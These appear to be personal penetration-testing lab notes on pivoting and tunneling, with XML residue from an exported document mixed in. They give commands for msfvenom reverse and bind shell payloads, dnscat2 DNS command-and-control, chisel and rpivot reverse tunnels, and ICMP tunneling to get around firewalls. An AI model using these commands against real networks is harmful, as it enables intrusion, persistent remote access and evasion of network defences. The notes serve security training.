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828uqid6uiz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Port Forwarding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yngabd5ooxu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SSH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ssh -L 1234:localhost:3306 ubuntu@10.129.202.64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localhost</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 1234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localhost:3306</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on ubuntu server side.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multiple hosts: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ssh -L 1234:localhost:3306 -L 8080:localhost:80 user@host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ph3bweon6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Dynamic port forwarding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ssh -D 9050 ubuntu@10.129.202.64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sent to port 9050 on my side is sent to the whole internal network on the target side.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proxychains it can use this port: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tail -4 /etc/proxychains.conf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socks4 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">127.0.0.1 9050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nmap with proxychains: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proxychains nmap -v -sn 172.16.5.1-200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proxychains + metasploit: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proxychains msfconsole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proxychains rdp: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proxychains xfreerdp /v:host /u:user /p:pass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vrp5xjbrue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2j71fkpntas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Remote Port Forwarding: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ssh -R &lt;Internal IP ofPivotHost&gt;:8080:0.0.0.0:8000 ubuntu@&lt;ipAddressofTarget&gt; -vN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target host, send all incoming messages going to the internal ip of the target host to my side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0.0.0.0:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). This is for reverse shells through the pivot host.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I set up the reverse shell to point to the target I have ssh to, and that will forward it to me(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0.0.0.0:8080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a6t8y4f46bc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Meterpreter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the shell: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https://www.revshells.com/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msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.38 -f elf -o backupjob LPORT=8080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&gt; use exploit/multi/handler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exploit(multi/handler) &gt; set payload linux/x64/meterpreter/reverse_tcp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payload =&gt; linux/x64/meterpreter/reverse_tcp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exploit(multi/handler) &gt; options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Payload options (windows/x64/meterpreter/reverse_tcp):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Name      Current Setting  Required  Description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----      ---------------  --------  -----------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EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)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LHOST     10.10.14.26      yes       The listen address (an interface may be specified)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LPORT     9001             yes       The listen port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42yotsembi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ig7aseijsv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Ping sweep on internal network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ping sweep to see all hosts on the internal network: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meterpreter &gt; run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23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[*] Performing ping sweep for IP range 172.16.5.0/23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sweep with bash regularly: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{1..254} ;do (ping -c 1 192.168.56.$i | grep "bytes from" &amp;) ;done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cmd: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/L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"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1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}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fz5ozow3pve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Configure proxy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msfconsole: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&gt; use auxiliary/server/socks_proxy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auxiliary(server/socks_proxy) &gt; set SRVPORT 9050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SRVPORT =&gt; 9050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auxiliary(server/socks_proxy) &gt; set SRVHOST 0.0.0.0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SRVHOST =&gt; 0.0.0.0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auxiliary(server/socks_proxy) &gt; set version 4a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version =&gt; 4a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auxiliary(server/socks_proxy) &gt; run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Auxiliary module running as background job 0.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Starting the SOCKS proxy server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auxiliary(server/socks_proxy) &gt; options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a listener on port 9050.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module to route everything through the meterpreter session from metasploit console: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&gt; use post/multi/manage/autoroute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post(multi/manage/autoroute) &gt; set SESSION 1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SESSION =&gt; 1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post(multi/manage/autoroute) &gt; set SUBNET 172.16.5.0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SUBNET =&gt; 172.16.5.0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post(multi/manage/autoroute) &gt; run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[!] SESSION may not be compatible with this module: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[!]  * incompatible session platform: linux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Running module against 10.129.202.64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Searching for subnets to autoroute.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[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.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[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.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Post module execution completed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way is to directly add routes from the meterpreter session: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meterpreter &gt; run autoroute -s 172.16.5.0/23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[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.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[!] Example: run post/multi/manage/autoroute OPTION=value [...]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Adding a route to 172.16.5.0/255.255.254.0...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[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64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Use the -p option to list all active routes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active routes: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meterpreter &gt; run autoroute -p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[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.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[!] Example: run post/multi/manage/autoroute OPTION=value [...]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 Routing Table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Subnet             Netmask            Gateway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------             -------            -------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10.129.0.0         255.255.0.0        Session 1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172.16.4.0         255.255.254.0      Session 1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172.16.5.0         255.255.254.0      Session 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can use proxychains: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proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn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with rdp(make sure xquartz is up):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proxychains4 -f proxychains.conf xfreerdp /v:172.16.5.35 /u:user '/p:pass!'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xlxvzsyano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Meterpreter port forwarding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tcp relay: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meterpreter &gt; portfwd add -l 3300 -p 3389 -r 172.16.5.19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Local TCP relay created: :3300 &lt;-&gt; 172.16.5.19:3389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3300</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> my side maps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172.16.5.19:3389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port forwarding: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meterpreter &gt; portfwd add -R -l 8081 -p 1234 -L 10.10.14.18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Local TCP relay created: 10.10.14.18:8081 &lt;-&gt; :1234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that goes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10.10.14.18:8081</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be sent to port 1234 on my side. Useful for reverse shells.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40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3kp86oulh3u8" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socat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l1t2oxbguxd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5yn9svbgjsy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Using socat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socat can create pipe sockets between 2 independent network channels.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ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80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 on port 8080, forward all traffic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10.10.14.18:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Can set this up on the victim server as an alternative to port forwarding with ssh.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bind shell listener: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ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443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listens on port 8080 and forwards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172.16.5.19:8443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bind shell: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msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443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&gt; use exploit/multi/handler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Using configured payload generic/shell_reverse_tcp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exploit(multi/handler) &gt; set payload windows/x64/meterpreter/bind_tcp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payload =&gt; windows/x64/meterpreter/bind_tcp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exploit(multi/handler) &gt; set RHOST 10.129.202.64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RHOST =&gt; 10.129.202.64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exploit(multi/handler) &gt; set LPORT 8080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LPORT =&gt; 8080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msf6 exploit(multi/handler) &gt; run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[*] Started bind TCP handler against 10.129.202.64:8080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bind shell established a connection from our side with the victim doing the listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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iousr1xn7q0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Other pivot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xxzsrvcqilq" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Going around obstacles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fnpil5mwnqr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SSH for windows: plink.exe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Plink</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, short for PuTTY Link, is a Windows command-line SSH tool that comes as a part of the PuTTY package when installed.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plink for ssh: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plink -ssh -D 9050 ubuntu@10.129.15.50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can use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https://www.proxifier.com/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creating the proxy setup on a windows side.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0brtpy17uyy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SSHUTTLE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https://github.com/sshuttle/sshuttle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the need to set up proxychains.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works for pivoting over ssh.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it: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sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v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entries in iptables, setting up all the forwarding.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traffic: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nmap -v -sV -p3389 172.16.5.19 -A -Pn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woyki6f9sw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x7lb1uqip6y" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Server pivoting with RPivot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https://github.com/klsecservices/rpivot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server on attack host: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python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0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on victim host: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ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999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Backconnecting to server 10.10.14.18 port 9999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target server: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proxychains firefox-esr 172.16.5.135:80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using http proxy + ntlm auth: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 client.py --server-ip &lt;IPaddressofTargetWebServer&gt; --server-port 8080 --ntlm-proxy-ip &lt;IPaddressofProxy&gt; --ntlm-proxy-port 8081 --domain &lt;nameofWindowsDomain&gt; --username &lt;username&gt; --password &lt;password&gt;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0e7ubdzfpey" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forwarding using windows netsh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Netsh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Windows command-line tool that can help with the network configuration of a particular Windows system. Here are just some of the networking related tasks we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Netsh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 routes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Viewing the firewall configuration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Adding proxies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Creating port forwarding rules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forward with netsh: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C:\\Windows\\system32&gt; netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25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port forward: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C:\\Windows\\system32&gt; netsh.exe interface portproxy show v4tov4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Listen on ipv4:             Connect to ipv4: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Address         Port        Address         Port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--------------- ----------  --------------- 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10.129.15.150   8080        172.16.5.25     3389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so now anything that goes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10.129.15.150:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is routed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172.16.5.25:3389</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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ydvy8h6wxpg" w:id="20"/>
      <w:bookmarkEnd w:id="2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Tunneling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7c3rmw5i3q1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Tunneling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tunneling routes network traffic through some protocol to hide stuff.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y1vfwlvxmi6" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNSCAT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https://github.com/iagox86/dnscat2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DNS to send data between hosts, with an encrypted C2 channel. sends data inside the TXT records.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making server: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sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache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start server, you get a secret key to give the client.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on victim’s side, use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https://github.com/lukebaggett/dnscat2-powershell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 C:\\htb&gt; Import-Module .\\dnscat2.ps1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 C:\\htb&gt; Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd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zzfyg7829dm" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel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https://github.com/jpillora/chisel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tccp/udp based tunneling tool secured by ssh.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chisel server on pivot host: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ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5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2022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=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2022/05/05 18:16:25 server: Listening on &lt;http://0.0.0.0:1234&gt;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to chisel server from attack host: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./chisel client -v 10.129.202.64:1234 socks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2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234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2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=&gt;socks: Listening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2022/05/05 14:21:18 client: tun: Bound proxies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2022/05/05 14:21:19 client: Handshaking...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2022/05/05 14:21:19 client: Sending config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2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)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2022/05/05 14:21:19 client: tun: SSH connected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proxychains config to use port 1080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tail -f /etc/proxychains.conf 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    proxy types: http, socks4, socks5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       ( auth types supported: "basic"-http  "user/pass"-socks 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[ProxyList]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add proxy here ...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meanwile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defaults set to "tor"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socks4 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">127.0.0.1 9050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socks5 127.0.0.1 1080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tsg24cr3sd4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Reverse Pivot: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case firewall rules block inbound, we can get a reverse tunnel, where the pivot host is the client, and the attacker is the server.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server on attack host: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./chisel server --reverse -v -p 1234 --socks5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2022/05/30 10:19:16 server: Reverse tunnelling enabled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2022/05/30 10:19:16 server: Fingerprint n6UFN6zV4F+MLB8WV3x25557w/gHqMRggEnn15q9xIk=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2022/05/30 10:19:16 server: Listening on &lt;http://0.0.0.0:1234&gt;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client on pivot victim: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ubuntu@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks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2022/05/30 14:19:29 client: Connecting to ws://10.10.14.17:1234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2022/05/30 14:19:29 client: Handshaking...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2022/05/30 14:19:30 client: Sending config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2022/05/30 14:19:30 client: Connected (Latency 117.204196ms)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2022/05/30 14:19:30 client: tun: SSH connected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4xkklxntqkd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ICMP Tunneling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https://github.com/utoni/ptunnel-ng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pings must be allowed in the firewall.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ib80pdul1kj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Basic port forwarding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server on target host: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ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22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[sudo] password for ubuntu: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./ptunnel-ng: /lib/x86_64-linux-gnu/libselinux.so.1: no version information available (required by ./ptunnel-ng)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[inf]: Starting ptunnel-ng 1.42.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[inf]: (c) 2004-2011 Daniel Stoedle, &lt;daniels@cs.uit.no&gt;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[inf]: (c) 2017-2019 Toni Uhlig,     &lt;matzeton@googlemail.com&gt;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[inf]: Security features by Sebastien Raveau, &lt;sebastien.raveau@epita.fr&gt;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[inf]: Forwarding incoming ping packets over TCP.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[inf]: Ping proxy is listening in privileged mode.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[inf]: Dropping privileges now.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with attack host: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drime@htb[/htb]$ sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22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[inf]: Starting ptunnel-ng 1.42.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[inf]: (c) 2004-2011 Daniel Stoedle, &lt;daniels@cs.uit.no&gt;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[inf]: (c) 2017-2019 Toni Uhlig,     &lt;matzeton@googlemail.com&gt;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[inf]: Security features by Sebastien Raveau, &lt;sebastien.raveau@epita.fr&gt;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[inf]: Relaying packets from incoming TCP streams.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now local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2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will go to the victim side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afu5zd8d7dg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Dynamic Port forwarding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with ssh, ssh through the tunnel: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ssh -D 9050 -p2222 -lubuntu 127.0.0.1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ubuntu@127.0.0.1's password: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Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)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&lt;snip&gt;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proxy with icmp tunnel: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drime@htb[/htb]$ proxychains nmap -sV -sT 172.16.5.19 -p3389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ProxyChains-3.1 (&lt;http://proxychains.sf.net&gt;)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Starting Nmap 7.92 ( &lt;https://nmap.org&gt; ) at 2022-05-11 11:10 EDT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|S-chain|-&lt;&gt;-127.0.0.1:9050-&lt;&gt;&lt;&gt;-172.16.5.19:80-&lt;&gt;&lt;&gt;-OK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|S-chain|-&lt;&gt;-127.0.0.1:9050-&lt;&gt;&lt;&gt;-172.16.5.19:3389-&lt;&gt;&lt;&gt;-OK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|S-chain|-&lt;&gt;-127.0.0.1:9050-&lt;&gt;&lt;&gt;-172.16.5.19:3389-&lt;&gt;&lt;&gt;-OK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Nmap scan report for 172.16.5.19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Host is up (0.12s latency).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PORT     STATE SERVICE       VERSION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3389/tcp open  ms-wbt-server Microsoft Terminal Services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Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows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Service detection performed. Please report any incorrect results at &lt;https://nmap.org/submit/&gt; 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Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds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everything will go through icmp only, bypassing firewalls.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a5wgwh50l7y" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP and SOCKS Tunneling with SocksOverRDP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tunneling using windows only.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color w:val="1155cc"/>
          <w:u w:val="singl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https://github.com/nccgroup/SocksOverRDP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tunnels packets over RDP.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color w:val="1155cc"/>
          <w:u w:val="singl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https://www.proxifier.com/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proxy server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loading socksoverrdp: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C:\\Users\\htb-student\\Desktop\\SocksOverRDP-x64&gt; regsvr32.exe SocksOverRDP-Plugin.dll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pivot host and start socksoverrdp with admin privileges.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socks listener started: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C:\\Users\\htb-student\\Desktop\\SocksOverRDP-x64&gt; netstat -antb | findstr 1080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TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING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starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network), and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port. See the clip below for a quick walkthrough of configuring Proxifier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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gbzd9keta0h" w:id="29"/>
      <w:bookmarkEnd w:id="2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Ligolo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fdl44ta8qjc2" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo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tunnel named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ligolo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your username on your computer</w:t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ip tuntap add user [your_username] mode tun ligolo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Bring the tunnel up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ip link set ligolo up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the proxy without a cert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./proxy -selfcert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agent computer, connect to your proxy server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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./agent -connect [ip address]:11601 -ignore-cert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session to select the agent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, then select 1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agent, start the tunnel on the proxy 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tunnel_start --tun ligolo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route on your proxy server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ip route add [ip address, 192.168.X.X]/24 dev ligolo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jpillora/chisel" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/SocksOverRDP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/utoni/ptunnel-ng" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proxifier.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proxifier.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proxifi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306" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/klsecservices/rpivot" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iagox86/dnscat2" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts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lukebaggett/dnscat2-powershell" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lukebaggett/dnscat2-powershell" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:330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